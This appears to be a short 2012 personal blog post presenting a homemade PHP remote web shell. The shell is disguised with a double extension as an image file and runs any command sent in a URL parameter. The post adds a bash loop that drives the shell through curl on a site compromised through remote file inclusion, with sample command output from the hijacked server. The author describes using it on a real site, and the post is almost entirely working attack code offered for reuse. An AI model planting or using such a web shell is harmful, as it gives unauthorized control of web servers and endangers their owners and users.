Too Cool for Internet Explorer

venerdì 31 agosto 2012

a (very) basic remote php shell

Hi folks, i'm finally back ;)

I know, there are several php-shells out there, but i like to build all by my own, thats the scope and the fun part.
So yesterday, exploiting some site with a RFI vuln, i reused my favorite "shell over http" variant ;)

here the php code to upload:
$ cat Hacking/image.php.jpg
< ?php
if($_GET[cmd] != "") {
    if ($_GET[plain] != "") {
        echo shell_exec($_GET[cmd]);
    } else {
        echo "
".shell_exec($_GET[cmd])."
"; } } ?> $

So we can use it with no "plain" argument from the browser, simply adding the "cmd" argument, and with "plain=1" argument from the terminal:
$ while [ 1 ]; do echo -n "$ " && read CMD && CMD2=`echo $CMD | sed -e 's/ /+/g'` && curl http://imavulnerablesite.com/vulnerable.php?parameters&plain=1&cmd=$CMD2+2%3E%261; done
$ id
uid=48(apache) gid=48(apache) groups=14(uucp),48(apache)
$ ls -la
total 136
drwxr-xr-x  7 root root  4096 Aug 30 14:49 .
drwxr-xr-x 13 root root  4096 May  9 14:55 ..
-rw-r--r--  1 root root    36 Apr  3 17:43 .htaccess
[...]

Happy hacking ;)

Nessun commento: